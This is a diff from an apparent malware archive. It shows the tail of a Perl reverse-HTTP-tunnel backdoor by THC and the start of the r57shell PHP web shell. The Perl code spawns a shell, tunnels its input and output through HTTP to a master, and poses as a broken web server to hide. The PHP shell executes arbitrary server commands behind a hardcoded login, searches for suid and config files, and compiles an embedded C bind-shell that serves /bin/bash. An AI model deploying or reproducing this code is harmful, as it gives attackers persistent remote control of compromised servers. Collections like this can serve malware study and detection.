|
||||||
|
if ($PROXY) { # setting the real config (for Proxy Support)
|
||||||
|
$REAL_SERVER = $PROXY;
|
||||||
|
$REAL_PORT = $PROXY_PORT;
|
||||||
|
$REAL_PREFIX = $MODE . " http://" . $SERVER . ":" . $LISTEN_PORT
|
||||||
|
. $CGI_PREFIX;
|
||||||
|
$PROXY_SUFFIX = $PROXY_SUFFIX . "Pragma: no-cache\r\n";
|
||||||
|
if ( $PROXY_USER && USER_PASSWORD ) {
|
||||||
|
&base64encoding;
|
||||||
|
$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$REAL_SERVER = $SERVER;
|
||||||
|
$REAL_PORT = $LISTEN_PORT;
|
||||||
|
$REAL_PREFIX = $MODE . " " . $CGI_PREFIX;
|
||||||
|
}
|
||||||
|
$REAL_PREFIX = $REAL_PREFIX . "?" if ($MODE eq "GET");
|
||||||
|
$REAL_PREFIX = $REAL_PREFIX . " HTTP/1.0\r\n" if ($MODE eq "POST");
|
||||||
|
AGAIN: if ($pid) { kill 9, $pid; }
|
||||||
|
if ($TIME) { # wait until the specified $TIME
|
||||||
|
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
|
||||||
|
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
|
||||||
|
= localtime(time);
|
||||||
|
$t=$hour . ":" . $min;
|
||||||
|
while ($TIME ne $t) {
|
||||||
|
sleep(28); # every 28 seconds we look at the watch
|
||||||
|
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
|
||||||
|
= localtime(time);
|
||||||
|
$t=$hour . ":" .$min;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
print STDERR "Slave activated\n" if $DEBUG;
|
||||||
|
if ($DAILY) { # if we must connect daily, we'll
|
||||||
|
if (fork) { # fork the daily shell process to
|
||||||
|
sleep(69); # ensure the master control process
|
||||||
|
goto AGAIN; # won't get stuck by a fucking cmd
|
||||||
|
} # the user executed.
|
||||||
|
print STDERR "forked\n" if $DEBUG;
|
||||||
|
}
|
||||||
|
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
|
||||||
|
$remote = sockaddr_in($REAL_PORT, $address);
|
||||||
|
$forked = 0;
|
||||||
|
GO: close(THC);
|
||||||
|
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
|
||||||
|
or die "can't create socket\n";
|
||||||
|
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
|
||||||
|
if (! $forked) { # fork failed? fuck, let's try again
|
||||||
|
pipe R_IN, W_IN; select W_IN; $|=1;
|
||||||
|
pipe R_OUT, W_OUT; select W_OUT; $|=1;
|
||||||
|
$pid = fork;
|
||||||
|
if (! defined $pid) {
|
||||||
|
close THC;
|
||||||
|
close R_IN; close W_IN;
|
||||||
|
close R_OUT; close W_OUT;
|
||||||
|
goto GO;
|
||||||
|
}
|
||||||
|
$forked = 1;
|
||||||
|
}
|
||||||
|
if (! $pid) { # this is the child process (execs $SHELL)
|
||||||
|
close R_OUT; close W_IN; close THC;
|
||||||
|
print STDERR "forking $SHELL in child\n" if $DEBUG;
|
||||||
|
open STDIN, "<&R_IN";
|
||||||
|
open STDOUT, ">&W_OUT";
|
||||||
|
open STDERR, ">&W_OUT";
|
||||||
|
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
|
||||||
|
close R_IN; close W_OUT;
|
||||||
|
exit(0);
|
||||||
|
} else { # this is the parent (data control + network)
|
||||||
|
close R_IN;
|
||||||
|
sleep($DELAY); # we wait $DELAY for the commands to complete
|
||||||
|
vec($rs, fileno(R_OUT), 1) = 1;
|
||||||
|
print STDERR "before: allwritten2stdin\n" if $DEBUG;
|
||||||
|
select($r = $rs, undef, undef, 30);
|
||||||
|
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
|
||||||
|
sleep(1); # The following readin of the command output
|
||||||
|
$output = ""; # looks weird. It must be! every system
|
||||||
|
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
|
||||||
|
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
|
||||||
|
while (select($w = $ws, undef, undef, 1)) {
|
||||||
|
read R_OUT, $readout, 1 || last;
|
||||||
|
$output = $output . $readout;
|
||||||
|
}
|
||||||
|
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
|
||||||
|
print STDERR "before: fucksunprob\n" if $DEBUG;
|
||||||
|
vec($ws, fileno(W_OUT), 1) = 1;
|
||||||
|
while (! select(undef, $w=$ws, undef, 0.001)) {
|
||||||
|
read R_OUT, $readout, 1 || last;
|
||||||
|
$output = $output . $readout;
|
||||||
|
}
|
||||||
|
print STDERR "after : fucksunprob\n" if $DEBUG;
|
||||||
|
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
|
||||||
|
print W_OUT "\000" || goto END_IT;
|
||||||
|
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
|
||||||
|
while (1) {
|
||||||
|
read R_OUT, $readout, 1 || last;
|
||||||
|
last if ($readout eq "\000");
|
||||||
|
$output = $output . $readout;
|
||||||
|
}
|
||||||
|
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
|
||||||
|
&uuencode; # does the encoding of the shell output
|
||||||
|
if ($MODE eq "GET") {
|
||||||
|
$encoded = $REAL_PREFIX . $encoded . " HTTP/1.0\r\n";
|
||||||
|
$encoded = $encoded . $PROXY_SUFFIX;
|
||||||
|
$encoded = $encoded . "\r\n";
|
||||||
|
} else { # $MODE is "POST"
|
||||||
|
$encoded = $REAL_PREFIX . $PROXY_SUFFIX
|
||||||
|
. "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
|
||||||
|
. $encoded . "\r\n";
|
||||||
|
}
|
||||||
|
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
|
||||||
|
connect(THC, $remote) || goto END_IT; # connect to master
|
||||||
|
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
|
||||||
|
send (THC, $encoded, 0) || goto END_IT; # and send data
|
||||||
|
$input = "";
|
||||||
|
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
|
||||||
|
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
|
||||||
|
while (! select($r = $rt, undef, undef, 0.00001)) {}
|
||||||
|
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
|
||||||
|
print STDERR "read data from socket until eod\n" if $DEBUG;
|
||||||
|
$error="no";
|
||||||
|
# while (1) { # read until EOD (End Of Data)
|
||||||
|
print STDERR "?" if $DEBUG;
|
||||||
|
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
|
||||||
|
recv (THC, $readin, 16386, 0) || undef $error;
|
||||||
|
# if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
|
||||||
|
print STDERR "!" if $DEBUG;
|
||||||
|
goto OK if (($readin eq "\000") or ($readin eq "\n")
|
||||||
|
or ($readin eq ""));
|
||||||
|
$input = $input . $readin;
|
||||||
|
# }
|
||||||
|
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
|
||||||
|
print STDERR "RECEIVE: $input\n" if $DEBUG;
|
||||||
|
$input =~ s/.*\r\n\r\n//s;
|
||||||
|
print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
|
||||||
|
&uudecode; # decoding the data from the master
|
||||||
|
print STDERR "AFTER DECODING: $decoded\n" if $DEBUG;
|
||||||
|
print STDERR "if password not found -> exit\n" if $DEBUG;
|
||||||
|
goto END_IT if ($decoded =~ m/^$PASSWORD/s == 0);
|
||||||
|
$decoded =~ s/^$PASSWORD//;
|
||||||
|
print STDERR "writing input data to $SHELL\n" if $DEBUG;
|
||||||
|
print W_IN "$decoded" || goto END_IT; # sending the data
|
||||||
|
sleep(1); # to the shell proc.
|
||||||
|
print STDERR "jumping to GO\n" if $DEBUG;
|
||||||
|
goto GO;
|
||||||
|
}
|
||||||
|
END_IT: kill 9, $pid; $pid = 0;
|
||||||
|
exit(0);
|
||||||
|
} # END OF SLAVE FUNCTION
|
||||||
|
|
||||||
|
############### MASTER FUNCTION ###############
|
||||||
|
|
||||||
|
sub master {
|
||||||
|
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
|
||||||
|
or die "can't create socket\n";
|
||||||
|
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
|
||||||
|
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
|
||||||
|
listen(THC, 3) || die "can't listen\n"; # print the HELP
|
||||||
|
print STDOUT '
|
||||||
|
Welcome to the Reverse-WWW-Tunnel-Backdoor v2.0 by van Hauser / THC ...
|
||||||
|
|
||||||
|
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
|
||||||
|
type in your commands to execute on SLAVE. You\'ll have to
|
||||||
|
wait min. the set $DELAY seconds before you get the output
|
||||||
|
and can execute the next stuff. Use ";" for multiple commands.
|
||||||
|
Trying to execute interactive commands may give you headache
|
||||||
|
so beware. Your SLAVE may hang until the daily connect try
|
||||||
|
(if set - otherwise you lost).
|
||||||
|
You also shouldn\'t try to view binary data too ;-)
|
||||||
|
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
|
||||||
|
friends if you don\'t like using vi in a delayed line mode ;-)
|
||||||
|
To exit this program on any time without doing harm to either
|
||||||
|
MASTER or SLAVE just press Control-C.
|
||||||
|
Now have fun.
|
||||||
|
';
|
||||||
|
|
||||||
|
YOP: print STDOUT "\nWaiting for connect ...";
|
||||||
|
$remote=accept (S, THC) || goto YOP; # get the connection
|
||||||
|
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
|
||||||
|
$slave=gethostbyaddr($r_slave, AF_INET); # data.
|
||||||
|
$slave="unresolved" if ($slave eq "");
|
||||||
|
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
|
||||||
|
select S; $|=1;
|
||||||
|
select STDOUT; $|=1;
|
||||||
|
$input = "";
|
||||||
|
vec($socks, fileno(S), 1) = 1;
|
||||||
|
$error="no";
|
||||||
|
# while (1) { # read the data sent by the slave
|
||||||
|
while (! select($r = $socks, undef, undef, 0.00001)) {}
|
||||||
|
recv (S, $readin, 16386, 0) || undef $error;
|
||||||
|
if ((! $error) and (! $BROKEN_RECV)) {
|
||||||
|
print STDOUT "[disconnected]\n";
|
||||||
|
}
|
||||||
|
# $readin =~ s/\r//g;
|
||||||
|
# $input = $input . $readin;
|
||||||
|
# last if ( $input =~ m/\r\n\r\n/s );
|
||||||
|
$input = $readin;
|
||||||
|
print STDERR "MASTER RECEIVE: $input\n" if $DEBUG;
|
||||||
|
# }
|
||||||
|
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
|
||||||
|
if ( $input =~ m/^GET /s ) {
|
||||||
|
$input =~ s/^.*($CGI_PREFIX)\??//s;
|
||||||
|
$input =~ s/\r\n.*$//s;
|
||||||
|
} else { if ( $input =~ m/^POST /s ) {
|
||||||
|
$input =~ s/^.*\r\n\r\n//s;
|
||||||
|
} else { if ( $input =~ m/^HEAD /s ) {
|
||||||
|
&hide_as_broken_webserver;
|
||||||
|
} else {
|
||||||
|
close S;
|
||||||
|
print STDOUT "Warning! Illegal server access!\n"; # report to user
|
||||||
|
goto YOP;
|
||||||
|
} } }
|
||||||
|
print STDERR "BEFORE DECODING: $input\n" if $DEBUG;
|
||||||
|
&uudecode; # decoding the data from the slave
|
||||||
|
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
|
||||||
|
$decoded =~ s/^$PASSWORD//s;
|
||||||
|
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
|
||||||
|
print STDOUT "$decoded"; # showing the slave output to the user
|
||||||
|
$output = <STDIN>; # and get his input.
|
||||||
|
&uuencode; # encode the data for the slave
|
||||||
|
$encoded = "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain\r\n\r\n" . $encoded . "\r\n";
|
||||||
|
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
|
||||||
|
close (S);
|
||||||
|
print STDOUT "sent.\n";
|
||||||
|
goto YOP; # wait for the next connect from the slave
|
||||||
|
} # END OF MASTER FUNCTION
|
||||||
|
|
||||||
|
###################### MISC. FUNCTIONS #####################
|
||||||
|
|
||||||
|
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
|
||||||
|
$output = $PASSWORD . $output; # PW is for error checking and
|
||||||
|
$uuencoded = pack "u", "$output"; # preventing sysadmins from
|
||||||
|
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
|
||||||
|
/'zcadefghjklmnopqrstuv' # data. No real
|
||||||
|
/; # security!
|
||||||
|
$uuencoded =~ tr/"'"/'b'/;
|
||||||
|
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
|
||||||
|
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
|
||||||
|
$cut_length = 4099 - (length $REAL_PREFIX);
|
||||||
|
$uuencoded = pack "a$cut_length", $uuencoded
|
||||||
|
if ($codelength > 4111);
|
||||||
|
}
|
||||||
|
$encoded = $uuencoded;
|
||||||
|
} # END OF UUENCODE FUNCTION
|
||||||
|
|
||||||
|
sub uudecode { # does the decoding of the data stream
|
||||||
|
$input =~ tr/'zcadefghjklmnopqrstuv'
|
||||||
|
/'\n)=(:;&><,#$*%]!\@"`\\\-'
|
||||||
|
/;
|
||||||
|
$input =~ tr/'b'/"'"/;
|
||||||
|
$decoded = unpack "u", "$input";
|
||||||
|
} # END OF UUDECODE FUNCTION
|
||||||
|
|
||||||
|
sub base64encoding { # does the base64 encoding for proxy passwords
|
||||||
|
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
|
||||||
|
$encoded_string = substr(pack('u', $encode_string), 1);
|
||||||
|
chomp($encoded_string);
|
||||||
|
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
|
||||||
|
$padding = (3 - length($encode_string) % 3) % 3;
|
||||||
|
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
|
||||||
|
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
|
||||||
|
} # END OF BASE64ENCODING FUNCTION
|
||||||
|
|
||||||
|
sub hide_as_broken_webserver { # invalid request -> look like broken server
|
||||||
|
send (S, "<HTML><HEAD>\r\n<TITLE>404 File Not Found</TITLE>\r\n</HEAD>".
|
||||||
|
"<BODY>\r\n<H1>File Not Found</H1>\r\n</BODY></HTML>\r\n", 0);
|
||||||
|
close S;
|
||||||
|
print STDOUT "Warning! Illegal server access!\n"; # report to user
|
||||||
|
goto YOP;
|
||||||
|
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
|
||||||
|
|
||||||
|
# END OF PROGRAM # (c) 1998-2002 by <vh@reptile.rug.ac.be>
|
||||||
|
|
1917
PHP/Backdoor.PHP.Rst.ai
Normal file
1917
PHP/Backdoor.PHP.Rst.ai
Normal file
File diff suppressed because it is too large
Load Diff
7
PHP/Backdoor.PHP.Rst.ak
Normal file
7
PHP/Backdoor.PHP.Rst.ak
Normal file
File diff suppressed because one or more lines are too long
2115
PHP/Backdoor.PHP.Rst.al
Normal file
2115
PHP/Backdoor.PHP.Rst.al
Normal file
File diff suppressed because it is too large
Load Diff
429
PHP/Backdoor.PHP.Rst.am
Normal file
429
PHP/Backdoor.PHP.Rst.am
Normal file
@ -0,0 +1,429 @@
|
|||||||
|
<?
|
||||||
|
/******************************************************************************************************/
|
||||||
|
/*
|
||||||
|
/* __________ ___ ___
|
||||||
|
/* \______ \__ __ ______/ | \
|
||||||
|
/* | _/ | \/ ___/ _ \
|
||||||
|
/* | | \ | /\___ \\ /
|
||||||
|
/* |____|_ /____//____ >\___|_ /
|
||||||
|
/* -======\/==security=\/=team==\/
|
||||||
|
/*
|
||||||
|
/* SPECIAL xbIx birthday edition
|
||||||
|
/*
|
||||||
|
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
|
||||||
|
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru
|
||||||
|
/* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ)
|
||||||
|
/*
|
||||||
|
/* Âîçìîæíîñòè:
|
||||||
|
/* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ
|
||||||
|
/* ~ âûïîëíåíèå øåëë-êîìàíä
|
||||||
|
/* ~ çàãðóçêà ôàéëîâ íà ñåðâåð
|
||||||
|
/* ~ ïîääåðæèâàåò àëèàñû êîìàíä
|
||||||
|
/* ~ âêëþ÷åíû 4 àëèàñà êîìàíä:
|
||||||
|
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì
|
||||||
|
/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì
|
||||||
|
/* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php
|
||||||
|
/* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ
|
||||||
|
/* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé
|
||||||
|
/* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò
|
||||||
|
/*
|
||||||
|
/* 05.03.2004 (c) RusH security team
|
||||||
|
/*
|
||||||
|
/******************************************************************************************************/
|
||||||
|
|
||||||
|
## Àóòåíòèôèêàöèÿ
|
||||||
|
|
||||||
|
## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
|
||||||
|
## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
|
||||||
|
$name="r57"; ## ëîãèí ïîëüçîâàòåëÿ
|
||||||
|
$pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ
|
||||||
|
|
||||||
|
if(!isset($PHP_AUTH_USER))
|
||||||
|
{
|
||||||
|
Header('WWW-Authenticate: Basic realm="r57shell"');
|
||||||
|
Header('HTTP/1.0 401 Unauthorized');
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(($PHP_AUTH_USER != $name ) || ($PHP_AUTH_PW != $pass))
|
||||||
|
{
|
||||||
|
Header('WWW-Authenticate: Basic realm="r57shell"');
|
||||||
|
Header('HTTP/1.0 401 Unauthorized');
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
error_reporting(0);
|
||||||
|
set_time_limit(0);
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Âûáîð ÿçûêà
|
||||||
|
$language='ru' - ðóññêèé
|
||||||
|
$language='eng' - àíãëèéñêèé
|
||||||
|
*/
|
||||||
|
|
||||||
|
$language='ru';
|
||||||
|
|
||||||
|
$lang=array(
|
||||||
|
'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà',
|
||||||
|
'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
|
||||||
|
'ru_text3' => 'Âûïîëíèòü êîìàíäó',
|
||||||
|
'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ',
|
||||||
|
'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð',
|
||||||
|
'ru_text6' => 'Ëîêàëüíûé ôàéë',
|
||||||
|
'ru_text7' => 'Àëèàñû',
|
||||||
|
'ru_text8' => 'Âûáåðèòå àëèàñ',
|
||||||
|
'ru_butt1' => 'Âûïîëíèòü',
|
||||||
|
'ru_butt2' => 'Çàãðóçèòü',
|
||||||
|
'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
|
||||||
|
'ru_text10' => 'Îòêðûòü ïîðò',
|
||||||
|
'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà',
|
||||||
|
'ru_butt3' => 'Îòêðûòü',
|
||||||
|
|
||||||
|
'eng_text1' => 'Executed command',
|
||||||
|
'eng_text2' => 'Execute command on server',
|
||||||
|
'eng_text3' => ' Run command',
|
||||||
|
'eng_text4' => 'Work directory',
|
||||||
|
'eng_text5' => 'Upload files on server',
|
||||||
|
'eng_text6' => 'Local file',
|
||||||
|
'eng_text7' => 'Aliases',
|
||||||
|
'eng_text8' => 'Select alias',
|
||||||
|
'eng_butt1' => 'Execute',
|
||||||
|
'eng_butt2' => 'Upload',
|
||||||
|
'eng_text9' => 'Bind port to /bin/bash',
|
||||||
|
'eng_text10' => 'Port',
|
||||||
|
'eng_text11' => 'Password for access',
|
||||||
|
'eng_butt3' => 'Bind'
|
||||||
|
);
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/*
|
||||||
|
Àëèàñû êîìàíä
|
||||||
|
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
|
||||||
|
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
|
||||||
|
*/
|
||||||
|
|
||||||
|
$aliases=array(
|
||||||
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
|
||||||
|
'find all suid files' => 'find / -type f -perm -04000 -ls',
|
||||||
|
|
||||||
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||||
|
'find all sgid files' => 'find / -type f -perm -02000 -ls',
|
||||||
|
|
||||||
|
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
|
||||||
|
'find config.inc.php files' => 'find / -type f -name config.inc.php',
|
||||||
|
|
||||||
|
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
|
'find writable directories and files' => 'find / -perm -2 -ls',
|
||||||
|
'----------------------------------------------------------------------------------------------------' => 'ls -la'
|
||||||
|
);
|
||||||
|
|
||||||
|
/* Port bind source */
|
||||||
|
$port_bind_bd_c="
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <errno.h>
|
||||||
|
int main(argc,argv)
|
||||||
|
int argc;
|
||||||
|
char **argv;
|
||||||
|
{
|
||||||
|
int sockfd, newfd;
|
||||||
|
char buf[30];
|
||||||
|
struct sockaddr_in remote;
|
||||||
|
if(argc < 3) usage(argv[0]);
|
||||||
|
if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ
|
||||||
|
remote.sin_family = AF_INET;
|
||||||
|
remote.sin_port = htons(atoi(argv[1]));
|
||||||
|
remote.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||||
|
sockfd = socket(AF_INET,SOCK_STREAM,0);
|
||||||
|
if(!sockfd) perror(\"socket error\");
|
||||||
|
bind(sockfd, (struct sockaddr *)&remote, 0x10);
|
||||||
|
listen(sockfd, 5);
|
||||||
|
while(1)
|
||||||
|
{
|
||||||
|
newfd=accept(sockfd,0,0);
|
||||||
|
dup2(newfd,0);
|
||||||
|
dup2(newfd,1);
|
||||||
|
dup2(newfd,2);
|
||||||
|
write(newfd,\"Password:\",10);
|
||||||
|
read(newfd,buf,sizeof(buf));
|
||||||
|
if (!chpass(argv[2],buf))
|
||||||
|
system(\"echo welcome to r57 shell && /bin/bash -i\");
|
||||||
|
else
|
||||||
|
fprintf(stderr,\"Sorry\");
|
||||||
|
close(newfd);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
int usage(char *progname)
|
||||||
|
{
|
||||||
|
fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname);
|
||||||
|
exit(0);
|
||||||
|
}
|
||||||
|
int chpass(char *base, char *entered) {
|
||||||
|
int i;
|
||||||
|
for(i=0;i<strlen(entered);i++)
|
||||||
|
{
|
||||||
|
if(entered[i] == '\n')
|
||||||
|
entered[i] = '\0';
|
||||||
|
}
|
||||||
|
if (!strcmp(base,entered))
|
||||||
|
return 0;
|
||||||
|
}";
|
||||||
|
|
||||||
|
?>
|
||||||
|
<!-- Çäðàâñòâóé Âàñÿ -->
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>r57shell</title>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
|
||||||
|
<STYLE>
|
||||||
|
tr {
|
||||||
|
BORDER-RIGHT: #aaaaaa 1px solid;
|
||||||
|
BORDER-TOP: #eeeeee 1px solid;
|
||||||
|
BORDER-LEFT: #eeeeee 1px solid;
|
||||||
|
BORDER-BOTTOM: #aaaaaa 1px solid;
|
||||||
|
}
|
||||||
|
td {
|
||||||
|
BORDER-RIGHT: #aaaaaa 1px solid;
|
||||||
|
BORDER-TOP: #eeeeee 1px solid;
|
||||||
|
BORDER-LEFT: #eeeeee 1px solid;
|
||||||
|
BORDER-BOTTOM: #aaaaaa 1px solid;
|
||||||
|
}
|
||||||
|
table {
|
||||||
|
BORDER-RIGHT: #eeeeee 2px outset;
|
||||||
|
BORDER-TOP: #eeeeee 2px outset;
|
||||||
|
BORDER-LEFT: #eeeeee 2px outset;
|
||||||
|
BORDER-BOTTOM: #eeeeee 2px outset;
|
||||||
|
BACKGROUND-COLOR: #D4D0C8;
|
||||||
|
}
|
||||||
|
input {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: 8pt Verdana;
|
||||||
|
}
|
||||||
|
select {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: 8pt Verdana;
|
||||||
|
}
|
||||||
|
submit {
|
||||||
|
BORDER-RIGHT: buttonhighlight 2px outset;
|
||||||
|
BORDER-TOP: buttonhighlight 2px outset;
|
||||||
|
BORDER-LEFT: buttonhighlight 2px outset;
|
||||||
|
BORDER-BOTTOM: buttonhighlight 2px outset;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
width: 30%;
|
||||||
|
}
|
||||||
|
textarea {
|
||||||
|
BORDER-RIGHT: #ffffff 1px solid;
|
||||||
|
BORDER-TOP: #999999 1px solid;
|
||||||
|
BORDER-LEFT: #999999 1px solid;
|
||||||
|
BORDER-BOTTOM: #ffffff 1px solid;
|
||||||
|
BACKGROUND-COLOR: #e4e0d8;
|
||||||
|
font: Fixedsys bold;
|
||||||
|
|
||||||
|
}
|
||||||
|
BODY {
|
||||||
|
margin-top: 1px;
|
||||||
|
margin-right: 1px;
|
||||||
|
margin-bottom: 1px;
|
||||||
|
margin-left: 1px;
|
||||||
|
}
|
||||||
|
A:link {COLOR:red; TEXT-DECORATION: none}
|
||||||
|
A:visited { COLOR:red; TEXT-DECORATION: none}
|
||||||
|
A:active {COLOR:red; TEXT-DECORATION: none}
|
||||||
|
A:hover {color:blue;TEXT-DECORATION: none}
|
||||||
|
</STYLE>
|
||||||
|
|
||||||
|
</head>
|
||||||
|
<body bgcolor="#e4e0d8">
|
||||||
|
<table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td bgcolor=#cccccc>
|
||||||
|
<!-- logo -->
|
||||||
|
<font face=Verdana size=2>
|
||||||
|
<font face=Webdings size=6><b>!</b></font><b> r57shell</b>
|
||||||
|
</font>
|
||||||
|
</td></tr><table>
|
||||||
|
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
|
||||||
|
<tr><td align=right width=100>
|
||||||
|
<?
|
||||||
|
/* change dir */
|
||||||
|
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
|
||||||
|
/* display information */
|
||||||
|
echo "<font face=Verdana size=-2>";
|
||||||
|
echo "<font color=blue><b>uname -a : <br>id : <br>pwd : </b></font><br>";
|
||||||
|
echo "</td><td>";
|
||||||
|
echo "<font face=Verdana size=-2 color=red><b>";
|
||||||
|
echo " ".exec("uname -a")."<br>";
|
||||||
|
echo " ".exec("id")."<br>";
|
||||||
|
echo " ".exec("pwd")."";
|
||||||
|
echo "</b></font>";
|
||||||
|
echo "</font>";
|
||||||
|
?>
|
||||||
|
</td></tr></table>
|
||||||
|
<?
|
||||||
|
/* port bind */
|
||||||
|
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
|
||||||
|
{
|
||||||
|
$w_file=fopen("/tmp/bd.c","ab+") or exit();
|
||||||
|
fputs($w_file,$port_bind_bd_c);
|
||||||
|
fclose($w_file);
|
||||||
|
$_POST['cmd']="cd /tmp/; gcc -o bd bd.c; ./bd ".$_POST['port']." ".$_POST['bind_pass']."; ps -aux | grep bd";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<?
|
||||||
|
/* alias execute */
|
||||||
|
